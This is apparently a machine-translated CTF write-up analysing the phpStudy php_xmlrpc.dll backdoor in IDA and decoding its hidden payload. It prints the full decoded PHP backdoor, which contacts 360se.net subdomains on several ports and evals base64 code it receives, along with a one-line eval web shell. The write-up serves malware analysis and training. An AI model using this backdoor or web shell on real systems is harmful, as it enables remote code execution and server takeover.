当前位置:网站首页>Analysis of backdoor vulnerability in remote code execution penetration test / / phpstudy of national game title of national secondary vocational network security B module
Analysis of backdoor vulnerability in remote code execution penetration test / / phpstudy of national game title of national secondary vocational network security B module
2022-07-05 05:32:00 【Ba1_ Ma0】
brief introduction
Those who need tools and environment can add groups 809706080, If you don't know something, you can also ask questions in it , I will answer at the first time when I see
1. Find the folder on the target desktop 1 Documents in RCEBackdoor.zip, Use static decompiler IDA Analyze the program in the compressed package , Analyze the target file according to the prompts , Take the range containing the base address offset of malicious code as Flag Value submission ( Submission Form :0x1000XXXX-0x1000XXXX);
After entering the desktop , Unzip the file , You can see the following files
Through my friend Yuze's middleware vulnerability article and this php Version of , It can be guessed that this question was tested in previous years phpstudy Backdoor vulnerability of
Yuze's article link :https://blog.csdn.net/liufdfd/article/details/125507247?spm=1001.2014.3001.5501
phpstudy Most of the backdoor vulnerabilities exist in :
phpStudy20180211 edition php5.4.45 And php5.2.17 ext Under the extended folder php_xmlrpc.dll
phpStudy20161103 edition php5.4.45 And php5.2.17 ext Under the extended folder php_xmlrpc.dll
We open this file directory and find the backdoor file
Then drag the file into ida pro analysis
We press shift+f12 You can display the string in the file , You can find these two strange strings below
This is commonly used php Pony code
<?php @eval($_POST['cmd']);?>
Can be judged , This string is the backdoor code
Next we cross reference , Jump to the section where this code is executed , We double-click the string
Double click this place , Jump to where the code is executed
This is where the code executes , We can press f5 Take a look at the pseudo code of this segment
According to the title , Take the range containing the base address offset of malicious code as Flag Value submission ,
We do reverse analysis from the place where the malicious code is executed , In this while The loop can find
The pseudocode executed from the bottom malicious code follows my thinking
v10 = &byte_10011B34;
v11 = asc_1000C028;
v41 = &byte_10011B34;
v12 = 0;
v13 = asc_1000C028;
while ( 1 )
{
if ( *(_DWORD *)v13 == 39 )
{
v10[v12] = 92;
v41[v12 + 1] = *v11; //v41 Got v11 Memory address of variable
v12 += 2;
v13 += 8;
}
else
{
v10[v12++] = *v11;
v13 += 4;
}
v11 += 4;
if ( (int)v11 >= (int)&unk_1000C66C ) // If v11 The value in the variable is greater than 1000C66C The value in the memory address
break;
v10 = v41; //v10 Variable =v41 Variable
}
spprintf(&v41, 0, "@eval(%s('%s'));", aGzuncompress, v41); // take @eval(%s('%s')); String and aGzuncompress The value in is stored in V41 variable
I only analyzed the code in key places , Code elsewhere is not important , In the analysis, we can know , The key offset address is V11 Sum of values in if In contrast to 1000C66C The value in the memory address
Take the range containing the base address offset of malicious code as Flag Value submission
0x1000C028-0x1000C66C
2. Continue to analyze the code after anti compilation , Find out the key functions in malicious code , Use the function name used for string splicing as Flag Value submission ;( Submission Form :echo())
This is much easier , We continue to ida Li analysis
You can find , The name of the concatenation string function is
spprintf
3. Continue to analyze the code after anti compilation , Find out the key functions in malicious code , Take the parameter name used to format the string as Flag Value submission ;( Submission Form :%*)
The malicious code is as follows
@eval(%s('%s'));
Thus we can see that , The parameter name used to format the string is
%s
4. Continue to analyze the code after anti compilation , Find out the key functions in malicious code , Use the parameter name used for string arguments as Flag Value submission ;( Submission Form :%*)
Through the above malicious code and learned c The language knows , The parameter name of the string parameter is
%s
5. Find the target Windows7 Folders on the desktop 1 Medium decode.py Document and improve this document , Fill in the blanks in this document F1、F2、F3、F4 Four strings , Take the contents of four strings after splicing as Flag Value submission
We turn on decode.py file
pivotal f1,f2,f3,f4 Code :
data = zlib.F1(data)
flag = b'F2'
hwrite.write(F3)
hwrite.write(F4)
#Flag=F1.F2.F3.F4
F1 yes python Of zlib Functions in modules
F1:
decompress
F2 It's the program aGzuncompress The value in the variable
We double-click this variable to view
F2:
gzuncompress
Through this code analysis
flag = b'F2'
offset = data.find(flag)
data = data[offset + 0x10:offset + 0x10 + 0x567*4].replace(b"\x00\x00\x00",b"")
decodedata_1 = zlib.F1(data[:0x191])
print(hexdump(data[0x191:]))
decodedata_2 = zlib.F1(data[0x191:])
with open("compres_data1.txt","w") as hwrite:
hwrite.write(F3)
hwrite.close
with open("compres_data2.txt","w") as hwrite:
hwrite.write(F4)
hwrite.close
F3 and F4 Respectively :
str(decodedata_1) and str(decodedata_2)
complete flag by :
decompress.gzuncompress.str(decodedata_1).str(decodedata_2)
6. perform decode.py Two files will be produced , Analyze and decode the contents of the second file , Arrange all port numbers in the port list from small to large as Flag value ( Such as :21,22,23,80) Submit ;
We fill in the missing code of the program and execute
From the generated second file, we can find
@ini_set("display_errors","0");
error_reporting(0);
function tcpGet($sendMsg = '', $ip = '360se.net', $port = '20123'){
$result = "";
$handle = stream_socket_client("tcp://{$ip}:{$port}", $errno, $errstr,10);
if( !$handle ){
$handle = fsockopen($ip, intval($port), $errno, $errstr, 5);
if( !$handle ){
return "err";
}
}
fwrite($handle, $sendMsg."\n");
while(!feof($handle)){
stream_set_timeout($handle, 2);
$result .= fread($handle, 1024);
$info = stream_get_meta_data($handle);
if ($info['timed_out']) {
break;
}
}
fclose($handle);
return $result;
}
$ds = array("www","bbs","cms","down","up","file","ftp");
$ps = array("20123","40125","8080","80","53");
$n = false;
do {
$n = false;
foreach ($ds as $d){
$b = false;
foreach ($ps as $p){
$result = tcpGet($i,$d.".360se.net",$p);
if ($result != "err"){
$b =true;
break;
}
}
if ($b)break;
}
$info = explode("<^>",$result);
if (count($info)==4){
if (strpos($info[3],"/*Onemore*/") !== false){
$info[3] = str_replace("/*Onemore*/","",$info[3]);
$n=true;
}
@eval(base64_decode($info[3]));
}
}while($n);
The order of port number from small to large is :
53,80,8080,20123,40125
poc utilize
You can read the article written by Yuze , It is also the national secondary vocational network security B Module questions , It is called middleware penetration testing
https://blog.csdn.net/liufdfd/article/details/125507247?spm=1001.2014.3001.5502
边栏推荐
- Haut OJ 1321: mode problem of choice sister
- Introduction to memory layout of FVP and Juno platforms
- Sword finger offer 58 - ii Rotate string left
- 26、 File system API (device sharing between applications; directory and file API)
- SSH password free login settings and use scripts to SSH login and execute instructions
- Gbase database helps the development of digital finance in the Bay Area
- Mysql database (I)
- Remote upgrade afraid of cutting beard? Explain FOTA safety upgrade in detail
- Educational Codeforces Round 116 (Rated for Div. 2) E. Arena
- Pointnet++的改进
猜你喜欢
剑指 Offer 04. 二维数组中的查找
Sword finger offer 06 Print linked list from beginning to end
lxml. etree. XMLSyntaxError: Opening and ending tag mismatch: meta line 6 and head, line 8, column 8
浅谈JVM(面试常考)
Gbase database helps the development of digital finance in the Bay Area
用STM32点个灯
个人开发的渗透测试工具Satania v1.2更新
sync. Interpretation of mutex source code
CF1634E Fair Share
Using HashMap to realize simple cache
随机推荐
26、 File system API (device sharing between applications; directory and file API)
每日一题-搜索二维矩阵ps二维数组的查找
C language Essay 1
F - Two Exam(AtCoder Beginner Contest 238)
ssh免密登录设置及使用脚本进行ssh登录并执行指令
[sum of two numbers] 169 sum of two numbers II - enter an ordered array
object serialization
Warning using room database: schema export directory is not provided to the annotation processor so we cannot export
2017 USP Try-outs C. Coprimes
[to be continued] [UE4 notes] L1 create and configure items
Find a good teaching video for Solon framework test (Solon, lightweight application development framework)
剑指 Offer 53 - I. 在排序数组中查找数字 I
Palindrome (csp-s-2021-palin) solution
动漫评分数据分析与可视化 与 IT行业招聘数据分析与可视化
Demonstration of using Solon auth authentication framework (simpler authentication framework)
To be continued] [UE4 notes] L4 object editing
Improvement of pointnet++
Web APIs DOM node
Educational Codeforces Round 107 (Rated for Div. 2) E. Colorings and Dominoes
After setting up the database and website When you open the app for testing, it shows that the server is being maintained